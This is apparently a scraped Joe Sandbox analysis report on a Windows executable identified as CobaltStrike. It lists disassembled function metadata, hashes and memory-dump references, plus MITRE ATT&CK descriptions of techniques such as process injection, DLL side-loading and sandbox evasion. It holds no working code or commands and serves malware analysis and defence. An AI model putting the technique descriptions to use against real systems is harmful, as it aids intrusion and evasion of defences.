Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction ID: b10d73533d85e5e96e8a3b0f75c6f2b38cf0b2811655e1ffbc2573af9fd10282
Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
Instruction Fuzzy Hash: C0019676724B4086DB10DF12D984759B765FB98FE4F584326AF581BB94CF38C645CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 0040D620

Strings

0K, xrefs: 0040D5F0
CCG , xrefs: 0040D61B

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: ExceptionRaise
String ID: 0K$CCG
API String ID: 3997070919-1785372017
Opcode ID: 65f01fccc157153d2d1701e1333d800f65e9452b128327a24fb38de8b3a4e49d
Instruction ID: ceb71ecc065b88f6ca66499348036a8ea7f308da33f776473f4abe36c19711e4
Opcode Fuzzy Hash: 65f01fccc157153d2d1701e1333d800f65e9452b128327a24fb38de8b3a4e49d
Instruction Fuzzy Hash: E8D02EA2B2008083FB8883EAF8007A61023D3CC7C2F80D036EE0A87788CA2EC0904B00

Uniqueness

Uniqueness Score: -1.00%

Function 03A61CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE

Download Yara Rule

APIs

calloc.LIBCMT ref: 03A61D6A

Part of subcall function 03A8CCC8: _calloc_impl.LIBCMT ref: 03A8CCD8
Part of subcall function 03A8CCC8: _errno.LIBCMT ref: 03A8CCEB
Part of subcall function 03A8CCC8: _errno.LIBCMT ref: 03A8CCF5

free.LIBCMT ref: 03A61EF3
free.LIBCMT ref: 03A61EFD
free.LIBCMT ref: 03A61F0F

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_calloc_implcalloc
String ID:
API String ID: 4000150058-0
Opcode ID: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
Instruction ID: 80bf744b85617340e48722f8c0d540e02f558745cb9383481f246e32dde6a0bd
Opcode Fuzzy Hash: 28a1bee2ed890e7cf2c8c28a8ac5cd76316822a62f845b1d042dc32352d46813
Instruction Fuzzy Hash: F4C1FC36604B84CAD764CF65E89479EBBB8F788B84F54412AEB8D47B18DF38C555CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0367875B Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0367878F

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

free.LIBCMT ref: 036788D6
free.LIBCMT ref: 0367893A
free.LIBCMT ref: 03678946

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction ID: 050d3d8103dc51956b82a03f10bad4aaa083b5a5d922376ce858891ba3cc6215
Opcode Fuzzy Hash: 39c475a2e60a0baff3062b371bd71c5d934258105383fc1888260d0083121c2a
Instruction Fuzzy Hash: 8951B435318B184BDB29FB2CD8995BE73D1FB88710F940A2DE44BC7245DE34D902878A

Uniqueness

Uniqueness Score: -1.00%

Function 0366DD1F Relevance: 5.2, APIs: 4, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0366DDBC

Part of subcall function 0367C9C3: _errno.LIBCMT ref: 0367C9FA
Part of subcall function 0367C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0367CA05

_snprintf.LIBCMT ref: 0366DDD8
_snprintf.LIBCMT ref: 0366DE4E
_snprintf.LIBCMT ref: 0366DE65

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction ID: 74b9e938f2e411cf5a7079d72e2799c8355ef76968ab99a8d828d948987b55e8
Opcode Fuzzy Hash: af8750bcd6550084eb4a2dd99c9bacf52ff47d8f7bcb806aa8302d3e1bf097e4
Instruction Fuzzy Hash: D061E534618B488FDB55EF28D884BAAB7E5FBA8300F50466ED44AC3290DF34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03663747 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 036637AA

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction ID: b0c4d0334aa12b5fd1784c184e0588ab7bb025be6b55bbd8e318a6640adcdd8c
Opcode Fuzzy Hash: 6742f55ff97963061a00db0c755add0bfe835af42cd6aee16a8aaf91f89f601c
Instruction Fuzzy Hash: AC411134618B054FCB1CDF2CD8815BAB3E5FB8839072425ADD88BC7366EE20E8028785

Uniqueness

Uniqueness Score: -1.00%

Function 03A79314 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A79348

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

free.LIBCMT ref: 03A7948F
free.LIBCMT ref: 03A794F3
free.LIBCMT ref: 03A794FF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
Instruction ID: fa0839951eeb07bbb1af7faeab3f32a392bc6309f416c2a8b6988236bd5912f7
Opcode Fuzzy Hash: 32250396aac46cb3c7f4cfd35d08813239d5f5291beebfd262bb8bbf460cd738
Instruction Fuzzy Hash: D051DF3A30074592DA18EF22AED476EB369FB81BD0F58042FCA5A5BB54DF7AC149C701

Uniqueness

Uniqueness Score: -1.00%

Function 03A64300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A64363

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
Instruction ID: f0a32d29da8bccf2622ee5ab1b52df8933d60db839fc92ae971507608112b8f7
Opcode Fuzzy Hash: 800eff24e48460816e58490102702d178b1ef3e3c2011002697bd4503662d013
Instruction Fuzzy Hash: 9C41C23270478197DB18DF27E95466D77A5F788F88F88492ADE6A4BB04EF38D846C700

Uniqueness

Uniqueness Score: -1.00%

Function 0040C920 Relevance: 5.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040C947
free.MSVCRT ref: 0040C998
LeaveCriticalSection.KERNEL32 ref: 0040C9A4

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 504a4203990e74e78a224447bea07cff1a31014514161254e4ec904d0b13c856
Instruction ID: e6198b7655618275f4cf589f910c13fce5b35ade31ef04366755f34a2f111490
Opcode Fuzzy Hash: 504a4203990e74e78a224447bea07cff1a31014514161254e4ec904d0b13c856
Instruction Fuzzy Hash: 570121E2717A04D2EF48CB65E8D072923A1F798B40F545636CA1A973B0EB3CC849C74C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cH0s914NeF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
cH0s914NeF.exe

Function 03A6E3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Function 004011B0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199
sleepCOMMON

Function 03A74578 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Function 004015F1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 120
COMMON

Function 00401DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64
memoryCOMMON

Function 03A61184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 004017D2 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95
memoryinjectionCOMMON

Function 03A6CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Function 00401CD7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
registryCOMMON

Function 00499EA0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 217
fileCOMMON

Function 03A6EC4C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 0040F430 Relevance: 4.5, APIs: 3, Instructions: 24
COMMON

Function 00401B4A Relevance: 3.1, APIs: 2, Instructions: 81
memoryCOMMON

Function 004019AC Relevance: 3.1, APIs: 2, Instructions: 56
injectionCOMMON

Function 0044CD80 Relevance: 1.6, APIs: 1, Instructions: 139
fileCOMMON